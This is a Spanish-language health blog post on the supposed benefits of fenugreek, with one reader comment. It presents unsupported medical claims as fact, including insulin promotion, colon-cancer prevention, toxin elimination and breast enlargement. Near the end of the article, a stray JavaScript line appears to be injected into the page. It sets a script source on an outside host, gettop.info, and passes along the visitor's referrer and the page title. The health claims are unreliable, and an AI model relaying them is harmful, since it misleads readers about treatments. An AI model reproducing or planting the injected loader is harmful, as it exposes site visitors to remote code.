Salud y belleza » Salud, Tratamientos caseros, alimentos

Los beneficios del fenogreco

1 Comentario

El fenogreco es una hierba medicinal que se suele usar de forma terapéutica para la pérdida de peso, aunque también se ha usado en algunas ocasiones para el control de la diabetes o la prevención de la caída del cabello. Por supuesto, también es utilizada en la dieta mediterránea como una especia con un sabor agridulce.

fenogreco

El fenogreco es una hierba muy popular como remedio para numerosos males gracias a sus propiedades. Funciona como afrodisíaco, como laxante, diaforético, estimulante, antiinflamatorio o antiparasitario. Sin duda, una hierba muy completa que no debes dejar de tener en cuenta para tus remedios caseros.

Se utiliza en muchas medicinas y remedios para curar infecciones en la piel. También para controlar el nivel de azúcar en sangre ya que promueve la producción de insulina. Esta hierba, además, ayuda a perder peso gracias a que reduce los tejidos grasos adiposos. También, al funcionar como laxante, estimula el funcionamiento del sistema digestivo y elimina toxinas del organismo, por lo que también es muy beneficioso para prevenir el cáncer de colon.

fenogreco-pechos

Además, tiene algunos beneficios adicionales como que promueve el crecimiento del cabello y funciona también como afrodisíaco ya que contiene diosgenina, que ayuda a aumentar la libido. Por otro lado, una de las propiedades más populares del fenogreco es que ayuda a aumentar el volumen de los senos de las mujeres.

¿Conocías todas estas propiedades sobre el fenogreco?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

One Comment »

  • Maria morales said:

    Genial
    y como lo puedo tomar para bajar de peso ?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.